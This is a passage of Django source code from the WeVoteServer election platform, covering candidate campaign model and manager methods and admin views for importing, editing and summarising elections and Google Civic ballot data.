full_name = self.display_candidate_name
return extract_last_name_from_full_name(full_name)
def political_party_display(self):
return candidate_party_display(self.party)
# We override the save function so we can auto-generate we_vote_id
def save(self, *args, **kwargs):
# Even if this data came from another source we still need a unique we_vote_id
if self.we_vote_id:
self.we_vote_id = self.we_vote_id.strip().lower()
if self.we_vote_id == "" or self.we_vote_id is None: # If there isn't a value...
# ...generate a new id
site_unique_id_prefix = fetch_site_unique_id_prefix()
next_local_integer = fetch_next_we_vote_id_last_candidate_campaign_integer()
# "wv" = We Vote
# site_unique_id_prefix = a generated (or assigned) unique id for one server running We Vote
# "cand" = tells us this is a unique id for a CandidateCampaign
# next_integer = a unique, sequential integer for this server - not necessarily tied to database id
self.we_vote_id = "wv{site_unique_id_prefix}cand{next_integer}".format(
site_unique_id_prefix=site_unique_id_prefix,
next_integer=next_local_integer,
)
if self.maplight_id == "": # We want this to be unique IF there is a value, and otherwise "None"
self.maplight_id = None
super(CandidateCampaign, self).save(*args, **kwargs)
def fetch_candidate_count_for_office(office_id=0, office_we_vote_id=''):
candidate_campaign_list = CandidateCampaignListManager()
results = candidate_campaign_list.retrieve_candidate_count_for_office(office_id, office_we_vote_id)
return results['candidate_count']
# See also 'convert_to_political_party_constant' in we_vote_functions/functions.py
def candidate_party_display(raw_party):
if raw_party == 'Amer. Ind.':
return 'American Independent'
if raw_party == 'DEM':
return 'Democrat'
if raw_party == 'Democratic':
return 'Democrat'
if raw_party == 'Party Preference: Democratic':
return 'Democrat'
if raw_party == 'GRN':
return 'Green'
if raw_party == 'LIB':
return 'Libertarian'
if raw_party == 'NPP':
return 'No Party Preference'
if raw_party == 'Party Preference: None':
return 'No Party Preference'
if raw_party == 'PF':
return 'Peace and Freedom'
if raw_party == 'REP':
return 'Republican'
if raw_party == 'Party Preference: Republican':
return 'Republican'
if raw_party.lower() == 'none':
return ''
else:
return raw_party
def mimic_google_civic_initials(name):
modified_name = name.replace(' A ', ' A. ')
modified_name = modified_name.replace(' B ', ' B. ')
modified_name = modified_name.replace(' C ', ' C. ')
modified_name = modified_name.replace(' D ', ' D. ')
modified_name = modified_name.replace(' E ', ' E. ')
modified_name = modified_name.replace(' F ', ' F. ')
modified_name = modified_name.replace(' G ', ' G. ')
modified_name = modified_name.replace(' H ', ' H. ')
modified_name = modified_name.replace(' I ', ' I. ')
modified_name = modified_name.replace(' J ', ' J. ')
modified_name = modified_name.replace(' K ', ' K. ')
modified_name = modified_name.replace(' L ', ' L. ')
modified_name = modified_name.replace(' M ', ' M. ')
modified_name = modified_name.replace(' N ', ' N. ')
modified_name = modified_name.replace(' O ', ' O. ')
modified_name = modified_name.replace(' P ', ' P. ')
modified_name = modified_name.replace(' Q ', ' Q. ')
modified_name = modified_name.replace(' R ', ' R. ')
modified_name = modified_name.replace(' S ', ' S. ')
modified_name = modified_name.replace(' T ', ' T. ')
modified_name = modified_name.replace(' U ', ' U. ')
modified_name = modified_name.replace(' V ', ' V. ')
modified_name = modified_name.replace(' W ', ' W. ')
modified_name = modified_name.replace(' X ', ' X. ')
modified_name = modified_name.replace(' Y ', ' Y. ')
modified_name = modified_name.replace(' Z ', ' Z. ')
return modified_name
class CandidateCampaignManager(models.Model):
def __unicode__(self):
return "CandidateCampaignManager"
def retrieve_candidate_campaign_from_id(self, candidate_campaign_id):
candidate_campaign_manager = CandidateCampaignManager()
return candidate_campaign_manager.retrieve_candidate_campaign(candidate_campaign_id)
def retrieve_candidate_campaign_from_we_vote_id(self, we_vote_id):
candidate_campaign_id = 0
candidate_campaign_manager = CandidateCampaignManager()
return candidate_campaign_manager.retrieve_candidate_campaign(candidate_campaign_id, we_vote_id)
def fetch_candidate_campaign_id_from_we_vote_id(self, we_vote_id):
candidate_campaign_id = 0
candidate_campaign_manager = CandidateCampaignManager()
results = candidate_campaign_manager.retrieve_candidate_campaign(candidate_campaign_id, we_vote_id)
if results['success']:
return results['candidate_campaign_id']
return 0
def fetch_candidate_campaign_we_vote_id_from_id(self, candidate_campaign_id):
we_vote_id = ''
candidate_campaign_manager = CandidateCampaignManager()
results = candidate_campaign_manager.retrieve_candidate_campaign(candidate_campaign_id, we_vote_id)
if results['success']:
return results['candidate_campaign_we_vote_id']
return ''
def fetch_google_civic_candidate_name_from_we_vote_id(self, we_vote_id):
candidate_campaign_id = 0
candidate_campaign_manager = CandidateCampaignManager()
results = candidate_campaign_manager.retrieve_candidate_campaign(candidate_campaign_id, we_vote_id)
if results['success']:
candidate_campaign = results['candidate_campaign']
return candidate_campaign.google_civic_candidate_name
return 0
def retrieve_candidate_campaign_from_maplight_id(self, candidate_maplight_id):
candidate_campaign_id = 0
we_vote_id = ''
candidate_campaign_manager = CandidateCampaignManager()
return candidate_campaign_manager.retrieve_candidate_campaign(
candidate_campaign_id, we_vote_id, candidate_maplight_id)
def retrieve_candidate_campaign_from_vote_smart_id(self, candidate_vote_smart_id):
candidate_campaign_id = 0
we_vote_id = ''
candidate_maplight_id = ''
candidate_name = ''
candidate_campaign_manager = CandidateCampaignManager()
return candidate_campaign_manager.retrieve_candidate_campaign(
candidate_campaign_id, we_vote_id, candidate_maplight_id, candidate_name, candidate_vote_smart_id)
def retrieve_candidate_campaign_from_candidate_name(self, candidate_name):
candidate_campaign_id = 0
we_vote_id = ''
candidate_maplight_id = ''
candidate_campaign_manager = CandidateCampaignManager()
results = candidate_campaign_manager.retrieve_candidate_campaign(
candidate_campaign_id, we_vote_id, candidate_maplight_id, candidate_name)
if results['success']:
return results
# Try to modify the candidate name, and search again
# MapLight for example will pass in "<NAME>" for example
candidate_name_try2 = candidate_name.replace(' ', ' ')
results = candidate_campaign_manager.retrieve_candidate_campaign(
candidate_campaign_id, we_vote_id, candidate_maplight_id, candidate_name_try2)
if results['success']:
return results
# MapLight also passes in "<NAME>" for example, and Google Civic uses "<NAME>"
candidate_name_try3 = mimic_google_civic_initials(candidate_name)
if candidate_name_try3 != candidate_name:
results = candidate_campaign_manager.retrieve_candidate_campaign(
candidate_campaign_id, we_vote_id, candidate_maplight_id, candidate_name_try3)
if results['success']:
return results
# Otherwise return failed results
return results
# NOTE: searching by all other variables seems to return a list of objects
def retrieve_candidate_campaign(
self, candidate_campaign_id, candidate_campaign_we_vote_id=None, candidate_maplight_id=None,
candidate_name=None, candidate_vote_smart_id=None):
error_result = False
exception_does_not_exist = False
exception_multiple_object_returned = False
candidate_campaign_on_stage = CandidateCampaign()
try:
if positive_value_exists(candidate_campaign_id):
candidate_campaign_on_stage = CandidateCampaign.objects.get(id=candidate_campaign_id)
candidate_campaign_id = candidate_campaign_on_stage.id
candidate_campaign_we_vote_id = candidate_campaign_on_stage.we_vote_id
status = "RETRIEVE_CANDIDATE_FOUND_BY_ID"
elif positive_value_exists(candidate_campaign_we_vote_id):
candidate_campaign_on_stage = CandidateCampaign.objects.get(we_vote_id=candidate_campaign_we_vote_id)
candidate_campaign_id = candidate_campaign_on_stage.id
candidate_campaign_we_vote_id = candidate_campaign_on_stage.we_vote_id
status = "RETRIEVE_CANDIDATE_FOUND_BY_WE_VOTE_ID"
elif positive_value_exists(candidate_maplight_id):
candidate_campaign_on_stage = CandidateCampaign.objects.get(maplight_id=candidate_maplight_id)
candidate_campaign_id = candidate_campaign_on_stage.id
candidate_campaign_we_vote_id = candidate_campaign_on_stage.we_vote_id
status = "RETRIEVE_CANDIDATE_FOUND_BY_MAPLIGHT_ID"
elif positive_value_exists(candidate_vote_smart_id):
candidate_campaign_on_stage = CandidateCampaign.objects.get(vote_smart_id=candidate_vote_smart_id)
candidate_campaign_id = candidate_campaign_on_stage.id
candidate_campaign_we_vote_id = candidate_campaign_on_stage.we_vote_id
status = "RETRIEVE_CANDIDATE_FOUND_BY_VOTE_SMART_ID"
elif positive_value_exists(candidate_name):
candidate_campaign_on_stage = CandidateCampaign.objects.get(candidate_name=candidate_name)
candidate_campaign_id = candidate_campaign_on_stage.id
candidate_campaign_we_vote_id = candidate_campaign_on_stage.we_vote_id
status = "RETRIEVE_CANDIDATE_FOUND_BY_NAME"
else:
status = "RETRIEVE_CANDIDATE_SEARCH_INDEX_MISSING"
except CandidateCampaign.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
exception_multiple_object_returned = True
status = "RETRIEVE_CANDIDATE_MULTIPLE_OBJECTS_RETURNED"
except CandidateCampaign.DoesNotExist:
exception_does_not_exist = True
status = "RETRIEVE_CANDIDATE_NOT_FOUND"
results = {
'success': True if convert_to_int(candidate_campaign_id) > 0 else False,
'status': status,
'error_result': error_result,
'DoesNotExist': exception_does_not_exist,
'MultipleObjectsReturned': exception_multiple_object_returned,
'candidate_campaign_found': True if convert_to_int(candidate_campaign_id) else False,
'candidate_campaign_id': convert_to_int(candidate_campaign_id),
'candidate_campaign_we_vote_id': candidate_campaign_we_vote_id,
'candidate_campaign': candidate_campaign_on_stage,
}
return results
def update_or_create_candidate_campaign(self, we_vote_id, google_civic_election_id, ocd_division_id,
contest_office_id, contest_office_we_vote_id, google_civic_candidate_name,
updated_candidate_campaign_values):
"""
Either update or create a candidate_campaign entry.
"""
exception_multiple_object_returned = False
new_candidate_created = False
candidate_campaign_on_stage = CandidateCampaign()
if not positive_value_exists(google_civic_election_id):
success = False
status = 'MISSING_GOOGLE_CIVIC_ELECTION_ID'
# We are avoiding requiring ocd_division_id
# elif not positive_value_exists(ocd_division_id):
# success = False
# status = 'MISSING_OCD_DIVISION_ID'
# DALE 2016-02-20 We are not requiring contest_office_id or contest_office_we_vote_id to match a candidate
# elif not positive_value_exists(contest_office_we_vote_id): # and not positive_value_exists(contest_office_id):
# success = False
# status = 'MISSING_CONTEST_OFFICE_ID'
elif not positive_value_exists(google_civic_candidate_name):
success = False
status = 'MISSING_GOOGLE_CIVIC_CANDIDATE_NAME'
else:
try:
# Note: When we decide to start updating candidate_name elsewhere within We Vote, we should stop
# updating candidate_name via subsequent Google Civic imports
# If coming from a record that has already been in We Vote
if positive_value_exists(we_vote_id) and positive_value_exists(contest_office_we_vote_id):
# If here we are using permanent public identifier contest_office_we_vote_id
candidate_campaign_on_stage, new_candidate_created = \
CandidateCampaign.objects.update_or_create(
google_civic_election_id__exact=google_civic_election_id,
we_vote_id__iexact=we_vote_id,
contest_office_we_vote_id__iexact=contest_office_we_vote_id,
defaults=updated_candidate_campaign_values)
# If coming (most likely) from a Google Civic import, or internal bulk update
else:
# If here we are using internal contest_office_id
candidate_campaign_on_stage, new_candidate_created = \
CandidateCampaign.objects.update_or_create(
google_civic_election_id__exact=google_civic_election_id,
# ocd_division_id__exact=ocd_division_id,
# 2016-02-20 We want to allow contest_office ids to change
# contest_office_we_vote_id__iexact=contest_office_we_vote_id,
google_civic_candidate_name__exact=google_civic_candidate_name,
defaults=updated_candidate_campaign_values)
success = True
status = 'CANDIDATE_CAMPAIGN_SAVED'
except CandidateCampaign.MultipleObjectsReturned as e:
success = False
status = 'MULTIPLE_MATCHING_CANDIDATE_CAMPAIGNS_FOUND'
exception_multiple_object_returned = True
exception_message_optional = status
handle_record_found_more_than_one_exception(
e, logger=logger, exception_message_optional=exception_message_optional)
results = {
'success': success,
'status': status,
'MultipleObjectsReturned': exception_multiple_object_returned,
'new_candidate_created': new_candidate_created,
'candidate_campaign': candidate_campaign_on_stage,
}
return results
def update_candidate_social_media(self, candidate, candidate_twitter_handle=False, candidate_facebook=False):
"""
Update a candidate entry with general social media data. If a value is passed in False
it means "Do not update"
"""
exception_does_not_exist = False
exception_multiple_object_returned = False
success = False
status = "ENTERING_UPDATE_CANDIDATE_SOCIAL_MEDIA"
values_changed = False
candidate_twitter_handle = candidate_twitter_handle.strip() if candidate_twitter_handle else False
candidate_facebook = candidate_facebook.strip() if candidate_facebook else False
# candidate_image = candidate_image.strip() if candidate_image else False
if candidate:
if candidate_twitter_handle:
if candidate_twitter_handle != candidate.candidate_twitter_handle:
candidate.candidate_twitter_handle = candidate_twitter_handle
values_changed = True
if candidate_facebook:
if candidate_facebook != candidate.facebook_url:
candidate.facebook_url = candidate_facebook
values_changed = True
if values_changed:
candidate.save()
success = True
status = "SAVED_CANDIDATE_SOCIAL_MEDIA"
else:
success = True
status = "NO_CHANGES_SAVED_TO_CANDIDATE_SOCIAL_MEDIA"
results = {
'success': success,
'status': status,
'DoesNotExist': exception_does_not_exist,
'MultipleObjectsReturned': exception_multiple_object_returned,
'candidate': candidate,
}
return results
def update_candidate_twitter_details(self, candidate, twitter_json):
"""
Update a candidate entry with details retrieved from the Twitter API.
"""
success = False
status = "ENTERING_UPDATE_CANDIDATE_TWITTER_DETAILS"
values_changed = False
if candidate:
if positive_value_exists(twitter_json['id']):
if convert_to_int(twitter_json['id']) != candidate.twitter_user_id:
candidate.twitter_user_id = convert_to_int(twitter_json['id'])
values_changed = True
if positive_value_exists(twitter_json['screen_name']):
if twitter_json['screen_name'] != candidate.candidate_twitter_handle:
candidate.candidate_twitter_handle = twitter_json['screen_name']
values_changed = True
if positive_value_exists(twitter_json['name']):
if twitter_json['name'] != candidate.twitter_name:
candidate.twitter_name = twitter_json['name']
values_changed = True
if positive_value_exists(twitter_json['followers_count']):
if convert_to_int(twitter_json['followers_count']) != candidate.twitter_followers_count:
candidate.twitter_followers_count = convert_to_int(twitter_json['followers_count'])
values_changed = True
if positive_value_exists(twitter_json['profile_image_url_https']):
if twitter_json['profile_image_url_https'] != candidate.twitter_profile_image_url_https:
candidate.twitter_profile_image_url_https = twitter_json['profile_image_url_https']
values_changed = True
if ('profile_banner_url' in twitter_json) and positive_value_exists(twitter_json['profile_banner_url']):
if twitter_json['profile_banner_url'] != candidate.twitter_profile_banner_url_https:
candidate.twitter_profile_banner_url_https = twitter_json['profile_banner_url']
values_changed = True
if positive_value_exists(twitter_json['profile_background_image_url_https']):
if twitter_json['profile_background_image_url_https'] != \
candidate.twitter_profile_background_image_url_https:
candidate.twitter_profile_background_image_url_https = \
twitter_json['profile_background_image_url_https']
values_changed = True
if positive_value_exists(twitter_json['description']):
if twitter_json['description'] != candidate.twitter_description:
candidate.twitter_description = twitter_json['description']
values_changed = True
if positive_value_exists(twitter_json['location']):
if twitter_json['location'] != candidate.twitter_location:
candidate.twitter_location = twitter_json['location']
values_changed = True
if values_changed:
candidate.save()
success = True
status = "SAVED_CANDIDATE_TWITTER_DETAILS"
else:
success = True
status = "NO_CHANGES_SAVED_TO_CANDIDATE_TWITTER_DETAILS"
results = {
'success': success,
'status': status,
'candidate': candidate,
}
return results
def clear_candidate_twitter_details(self, candidate):
"""
Update an candidate entry with details retrieved from the Twitter API.
"""
success = False
status = "ENTERING_UPDATE_CANDIDATE_TWITTER_DETAILS"
if candidate:
candidate.twitter_user_id = 0
# We leave the handle in place
# candidate.candidate_twitter_handle = ""
candidate.twitter_name = ''
candidate.twitter_followers_count = 0
candidate.twitter_profile_image_url_https = ''
candidate.twitter_description = ''
candidate.twitter_location = ''
candidate.save()
success = True
status = "CLEARED_CANDIDATE_TWITTER_DETAILS"
results = {
'success': success,
'status': status,
'candidate': candidate,
}
return results
def refresh_cached_candidate_info(self, candidate_object):
"""
The candidate tables cache information from other tables. This function reaches out to the source tables
and copies over the latest information to the candidate table.
:param candidate_object:
:return:
"""
candidate_change = False
if not positive_value_exists(candidate_object.contest_office_id) \
or not positive_value_exists(candidate_object.contest_office_we_vote_id) \
or not positive_value_exists(candidate_object.contest_office_name):
office_found = False
contest_office_manager = ContestOfficeManager()
if positive_value_exists(candidate_object.contest_office_id):
results = contest_office_manager.retrieve_contest_office_from_id(candidate_object.contest_office_id)
office_found = results['contest_office_found']
elif positive_value_exists(candidate_object.contest_office_we_vote_id):
results = contest_office_manager.retrieve_contest_office_from_we_vote_id(
candidate_object.contest_office_we_vote_id)
office_found = results['contest_office_found']
if office_found:
office_object = results['contest_office']
if not positive_value_exists(candidate_object.contest_office_id):
candidate_object.contest_office_id = office_object.id
candidate_change = True
if not positive_value_exists(candidate_object.contest_office_we_vote_id):
candidate_object.contest_office_we_vote_id = office_object.we_vote_id
candidate_change = True
if not positive_value_exists(candidate_object.contest_office_name):
candidate_object.contest_office_name = office_object.office_name
candidate_change = True
if candidate_change:
candidate_object.save()
return candidate_object
```
#### File: WeVoteServer/config/startup.py
```python
import wevote_functions.admin
from config import settings
def run():
wevote_functions.admin.setup_logging(
stream=settings.LOG_STREAM,
logfile=settings.LOG_FILE,
stream_level=settings.LOG_STREAM_LEVEL,
file_level=settings.LOG_FILE_LEVEL
)
print('Running')
```
#### File: WeVoteServer/election/views_admin.py
```python
from .controllers import election_remote_retrieve, elections_import_from_master_server, elections_sync_out_list_for_api
from .models import Election
from .serializers import ElectionSerializer
from admin_tools.views import redirect_to_sign_in_page
from ballot.models import BallotReturnedListManager
from candidate.models import CandidateCampaignListManager
from django.http import HttpResponse, HttpResponseRedirect
from django.core.urlresolvers import reverse
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.messages import get_messages
from django.shortcuts import render
from election.models import ElectionManager
from exception.models import handle_record_found_more_than_one_exception, handle_record_not_found_exception, \
handle_record_not_saved_exception
from import_export_google_civic.controllers import retrieve_one_ballot_from_google_civic_api, \
store_one_ballot_from_google_civic_api
import json
from office.models import ContestOfficeListManager
from polling_location.models import PollingLocation
from position.models import PositionListManager
from rest_framework.views import APIView
from rest_framework.response import Response
from voter.models import voter_has_authority
import wevote_functions.admin
from wevote_functions.functions import convert_to_int, get_voter_device_id, positive_value_exists
from wevote_settings.models import fetch_next_we_vote_election_id_integer
logger = wevote_functions.admin.get_logger(__name__)
@login_required
def election_all_ballots_retrieve_view(request, election_local_id=0):
"""
Reach out to Google and retrieve (for one election):
1) Polling locations (so we can use those addresses to retrieve a representative set of ballots)
2) Cycle through a portion of those polling locations, enough that we are caching all of the possible ballot items
:param request:
:return:
"""
authority_required = {'admin'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
try:
if positive_value_exists(election_local_id):
election_on_stage = Election.objects.get(id=election_local_id)
else:
election_on_stage = Election.objects.get(google_civic_election_id=google_civic_election_id)
election_local_id = election_on_stage.id
except Election.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
messages.add_message(request, messages.ERROR, 'Could not retrieve ballot data. More than one election found.')
return HttpResponseRedirect(reverse('election:election_list', args=()))
except Election.DoesNotExist:
messages.add_message(request, messages.ERROR, 'Could not retrieve ballot data. Election could not be found.')
return HttpResponseRedirect(reverse('election:election_list', args=()))
# Check to see if we have polling location data related to the region(s) covered by this election
# We request the ballot data for each polling location as a way to build up our local data
state = election_on_stage.get_election_state()
try:
polling_location_count_query = PollingLocation.objects.all()
polling_location_count_query = polling_location_count_query.filter(state__iexact=state)
polling_location_count = polling_location_count_query.count()
polling_location_list = PollingLocation.objects.all()
polling_location_list = polling_location_list.filter(state__iexact=state)
# We used to have a limit of 500 ballots to pull per election, but now retrieve all
# Ordering by "location_name" creates a bit of (locational) random order
polling_location_list = polling_location_list.order_by('location_name') # [:500]
except PollingLocation.DoesNotExist:
messages.add_message(request, messages.INFO,
'Could not retrieve ballot data for the {election_name}. '
'No polling locations exist for the state \'{state}\'. '
'Data needed from VIP.'.format(
election_name=election_on_stage.election_name,
state=state))
return HttpResponseRedirect(reverse('election:election_summary', args=(election_local_id,)))
if polling_location_count == 0:
messages.add_message(request, messages.ERROR,
'Could not retrieve ballot data for the {election_name}. '
'No polling locations returned for the state \'{state}\'. (error 2)'.format(
election_name=election_on_stage.election_name,
state=state))
return HttpResponseRedirect(reverse('election:election_summary', args=(election_local_id,)))
ballots_retrieved = 0
ballots_not_retrieved = 0
ballots_with_contests_retrieved = 0
# We used to only retrieve up to 500 locations from each state, but we don't limit now
# # We retrieve 10% of the total polling locations, which should give us coverage of the entire election
# number_of_polling_locations_to_retrieve = int(.1 * polling_location_count)
for polling_location in polling_location_list:
success = False
# Get the address for this polling place, and then retrieve the ballot from Google Civic API
text_for_map_search = polling_location.get_text_for_map_search()
one_ballot_results = retrieve_one_ballot_from_google_civic_api(
text_for_map_search, election_on_stage.google_civic_election_id)
if one_ballot_results['success']:
one_ballot_json = one_ballot_results['structured_json']
store_one_ballot_results = store_one_ballot_from_google_civic_api(one_ballot_json, 0,
polling_location.we_vote_id)
if store_one_ballot_results['success']:
success = True
if success:
ballots_retrieved += 1
else:
ballots_not_retrieved += 1
if one_ballot_results['contests_retrieved']:
ballots_with_contests_retrieved += 1
# We used to only retrieve up to 500 locations from each state, but we don't limit now
# # Break out of this loop, assuming we have a minimum number of ballots with contests retrieved
# # If we don't achieve the minimum number of ballots_with_contests_retrieved, break out at the emergency level
# emergency = (ballots_retrieved + ballots_not_retrieved) >= (3 * number_of_polling_locations_to_retrieve)
# if ((ballots_retrieved + ballots_not_retrieved) >= number_of_polling_locations_to_retrieve and
# ballots_with_contests_retrieved > 20) or emergency:
# break
if ballots_retrieved > 0:
total_retrieved = ballots_retrieved + ballots_not_retrieved
messages.add_message(request, messages.INFO,
'Ballot data retrieved from Google Civic for the {election_name}. '
'(ballots retrieved: {ballots_retrieved} '
'(with contests: {ballots_with_contests_retrieved}), '
'not retrieved: {ballots_not_retrieved}, '
'total: {total})'.format(
ballots_retrieved=ballots_retrieved,
ballots_not_retrieved=ballots_not_retrieved,
ballots_with_contests_retrieved=ballots_with_contests_retrieved,
election_name=election_on_stage.election_name,
total=total_retrieved))
else:
messages.add_message(request, messages.ERROR,
'Ballot data NOT retrieved from Google Civic for the {election_name}.'
' (not retrieved: {ballots_not_retrieved})'.format(
ballots_not_retrieved=ballots_not_retrieved,
election_name=election_on_stage.election_name))
return HttpResponseRedirect(reverse('election:election_summary', args=(election_local_id,)))
@login_required
def election_edit_view(request, election_local_id):
authority_required = {'admin'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
messages_on_stage = get_messages(request)
election_local_id = convert_to_int(election_local_id)
election_on_stage_found = False
election_on_stage = Election()
if positive_value_exists(election_local_id):
try:
election_on_stage = Election.objects.get(id=election_local_id)
election_on_stage_found = True
except Election.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
except Election.DoesNotExist:
# This is fine, create new
pass
else:
# If here we are creating a
pass
if election_on_stage_found:
template_values = {
'messages_on_stage': messages_on_stage,
'election': election_on_stage,
}
else:
template_values = {
'messages_on_stage': messages_on_stage,
}
return render(request, "election/election_edit.html", template_values)
@login_required()
def election_edit_process_view(request):
"""
Process the new or edit election forms
:param request:
:return:
"""
authority_required = {'admin'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
election_local_id = convert_to_int(request.POST.get('election_local_id', 0))
election_name = request.POST.get('election_name', False)
election_day_text = request.POST.get('election_day_text', False)
state_code = request.POST.get('state_code', False)
election_on_stage = Election()
election_changed = False
# Check to see if this election is already being used anywhere
election_on_stage_found = False
try:
election_query = Election.objects.filter(id=election_local_id)
if len(election_query):
election_on_stage = election_query[0]
election_on_stage_found = True
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
try:
if election_on_stage_found:
if convert_to_int(election_on_stage.google_civic_election_id) < 1000000:
# If here, this is an election created by Google Civic and we limit what fields to update
# Update
if state_code is not False:
election_on_stage.state_code = state_code
election_changed = True
if election_changed:
election_on_stage.save()
messages.add_message(request, messages.INFO, 'Google Civic-created election updated.')
else:
# If here, this is a We Vote created election
# Update
if election_name is not False:
election_on_stage.election_name = election_name
election_changed = True
if election_day_text is not False:
election_on_stage.election_day_text = election_day_text
election_changed = True
if state_code is not False:
election_on_stage.state_code = state_code
election_changed = True
if election_changed:
election_on_stage.save()
messages.add_message(request, messages.INFO, 'We Vote-created election updated.')
else:
# Create new
next_local_election_id_integer = fetch_next_we_vote_election_id_integer()
election_on_stage = Election(
google_civic_election_id=next_local_election_id_integer,
election_name=election_name,
election_day_text=election_day_text,
state_code=state_code,
)
election_on_stage.save()
messages.add_message(request, messages.INFO, 'New election saved.')
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
messages.add_message(request, messages.ERROR, 'Could not save election.')
return HttpResponseRedirect(reverse('election:election_list', args=()))
@login_required()
def election_list_view(request):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
messages_on_stage = get_messages(request)
election_list_query = Election.objects.all()
election_list_query = election_list_query.order_by('election_day_text').reverse()
election_list = election_list_query
template_values = {
'messages_on_stage': messages_on_stage,
'election_list': election_list,
}
return render(request, 'election/election_list.html', template_values)
@login_required()
def election_remote_retrieve_view(request):
"""
Reach out to Google and retrieve the latest list of available elections
:param request:
:return:
"""
authority_required = {'admin'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
results = election_remote_retrieve()
if not results['success']:
messages.add_message(request, messages.INFO, results['status'])
else:
messages.add_message(request, messages.INFO, 'Upcoming elections retrieved from Google Civic.')
return HttpResponseRedirect(reverse('election:election_list', args=()))
@login_required()
def election_summary_view(request, election_local_id):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
messages_on_stage = get_messages(request)
election_local_id = convert_to_int(election_local_id)
election_on_stage_found = False
election_on_stage = Election()
try:
election_on_stage = Election.objects.get(id=election_local_id)
election_on_stage_found = True
except Election.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
except Election.DoesNotExist:
# This is fine, proceed anyways
pass
if election_on_stage_found:
ballot_returned_list_manager = BallotReturnedListManager()
ballot_returned_list_results = ballot_returned_list_manager.retrieve_ballot_returned_list_for_election(
election_on_stage.google_civic_election_id)
if ballot_returned_list_results['success']:
ballot_returned_list = ballot_returned_list_results['ballot_returned_list']
else:
ballot_returned_list = []
template_values = {
'messages_on_stage': messages_on_stage,
'election': election_on_stage,
'ballot_returned_list': ballot_returned_list,
}
else:
template_values = {
'messages_on_stage': messages_on_stage,
}
return render(request, 'election/election_summary.html', template_values)
# TODO Which of these two do we standardize on?
class ElectionsSyncOutView(APIView):
"""
Export raw voter data to JSON format
"""
def get(self, request): # Removed: , format=None
voter_device_id = get_voter_device_id(request) # We standardize how we take in the voter_device_id
results = elections_sync_out_list_for_api(voter_device_id)
if 'success' not in results:
json_data = results['json_data']
return HttpResponse(json.dumps(json_data), content_type='application/json')
elif not results['success']:
json_data = results['json_data']
return HttpResponse(json.dumps(json_data), content_type='application/json')
else:
election_list = results['election_list']
serializer = ElectionSerializer(election_list, many=True)
return Response(serializer.data)
# This page does not need to be protected.
class ExportElectionDataView(APIView):
def get(self, request, format=None):
election_list = Election.objects.all()
serializer = ElectionSerializer(election_list, many=True)
return Response(serializer.data)
@login_required
def elections_import_from_master_server_view(request):
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
state_code = request.GET.get('state_code', '')
results = elections_import_from_master_server()
if not results['success']:
messages.add_message(request, messages.ERROR, results['status'])
else:
messages.add_message(request, messages.INFO, 'Elections import completed. '
'Saved: {saved}, Updated: {updated}, '
'Not processed: {not_processed}'
''.format(saved=results['saved'],
updated=results['updated'],
not_processed=results['not_processed']))
return HttpResponseRedirect(reverse('admin_tools:sync_dashboard', args=()) + "?google_civic_election_id=" +
str(google_civic_election_id) + "&state_code=" + str(state_code))
@login_required()
def election_migration_view(request):
authority_required = {'admin'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
messages_on_stage = get_messages(request)
election_manager = ElectionManager()
we_vote_election = Election()
office_list_manager = ContestOfficeListManager()
candidate_list_manager = CandidateCampaignListManager()
position_list_manager = PositionListManager()
we_vote_election_office_list = []
google_civic_election_office_list = []
results = election_manager.retrieve_we_vote_elections()
we_vote_election_list = results['election_list']
state_code_list = []
for election in we_vote_election_list:
if election.state_code not in state_code_list:
state_code_list.append(election.state_code)
google_civic_election = Election()
results = election_manager.retrieve_google_civic_elections_in_state_list(state_code_list)
google_civic_election_list = results['election_list']
we_vote_election_id = convert_to_int(request.GET.get('we_vote_election_id', 0))
if not positive_value_exists(we_vote_election_id):
we_vote_election_id = convert_to_int(request.POST.get('we_vote_election_id', 0))
if positive_value_exists(we_vote_election_id):
results = election_manager.retrieve_election(we_vote_election_id)
if results['election_found']:
we_vote_election = results['election']
return_list_of_objects = True
results = office_list_manager.retrieve_all_offices_for_upcoming_election(we_vote_election_id,
return_list_of_objects)
if results['office_list_found']:
we_vote_election_office_list = results['office_list_objects']
# Go through each office and attach a list of candidates under this office
we_vote_election_office_list_new = []
for one_office in we_vote_election_office_list:
candidate_results = candidate_list_manager.retrieve_all_candidates_for_office(0, one_office.we_vote_id)
if candidate_results['candidate_list_found']:
candidate_list = candidate_results['candidate_list']
new_candidate_list = []
# Go through candidate_list and find the number of positions saved for each candidate
for candidate in candidate_list:
retrieve_public_positions = True # The alternate is positions for friends-only
position_list = position_list_manager.retrieve_all_positions_for_candidate_campaign(
retrieve_public_positions, 0, candidate.we_vote_id)
candidate.position_count = len(position_list) # This is wasteful (instead of using count), but ok
# Now find the candidates from the Google Civic Election that we might want to transfer data to
new_candidate_list.append(candidate)
one_office.candidate_list = new_candidate_list
else:
one_office.candidate_list = []
we_vote_election_office_list_new.append(one_office)
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
if not positive_value_exists(google_civic_election_id):
google_civic_election_id = convert_to_int(request.POST.get('google_civic_election_id', 0))
if positive_value_exists(google_civic_election_id):
results = election_manager.retrieve_election(google_civic_election_id)
if results['election_found']:
google_civic_election = results['election']
return_list_of_objects = True
